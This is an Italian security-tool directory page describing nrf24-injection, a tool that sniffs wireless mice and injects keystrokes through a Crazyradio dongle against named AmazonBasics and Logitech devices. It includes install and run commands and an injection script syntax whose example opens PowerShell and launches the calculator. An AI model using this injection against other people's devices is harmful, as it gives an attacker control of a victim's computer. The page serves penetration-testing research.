Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nrf24-injection — Un set di strumenti per lo sniffing di dispositivi e il lancio di attacchi con Crazyradio | Kitploit
Strumenti/GitHubGitHub/xswxm/nrf24-injection
ExploitSicurezza WirelessHacking HardwarePenetration Testing
GitHubxswxm/nrf24-injection

nrf24-injection

Un set di strumenti per lo sniffing di dispositivi e il lancio di attacchi con Crazyradio

Vedi Repository
1818 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

Un set di strumenti per sniffare dispositivi e lanciare attacchi con Crazyradio. Basato sulla ricerca di BastilleResearch.

Configurazione

Installa i moduli aggiuntivi

root@kitploit:~
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio

Dispositivi Supportati

DispositivoSniffAttaccoDettagli
AmazonBasicsSì(non risponde)SìControllo del mouse e HID Injection
Logitech MiceSìSìControllo del mouse

Come Usare

root@kitploit:~
# Run directly
sudo python app.py
# For Crazyradio PA users
sudo python app.py -l
# Check for help documents
sudo python app.py -h

Come Lanciare Attacchi

root@kitploit:~
# Please check attacking rules in 'devices/*.py' for details
# Further infomation will added to here once I have time
# Attacking thread sleeps for 100 milliseconds
<SLP(100)>
# Move mouse by 100*100 only
<MOV(100,100)>
# Press Left button only (Mouse)
<MOV(L)>
# Move mouse by 100*100 and press Left, Right and Middle buttons
<MOV(100,100,LMR)>
# Release the buttons for mice, you can send another MOV command without any buttons
<MOV(0,0)>
<MOV()>
# Send keystrokes to release all keys
<RLS>
# Send 'Windows + r' key combination
<WIN+r>
# Send 'Ctrl + Alt + Delete' key combination
<CTRL+ALT+DEL>
# For Windows computers, the following commmand will open the Powershell and then open the Caculator
<RLS><WIN+r><RLS><SLP(500)><RLS>powershell<ENTER><RLS><SLP(500)><RLS>calc<ENTER><RLS>

Licenza

GPL

Scarica lo strumento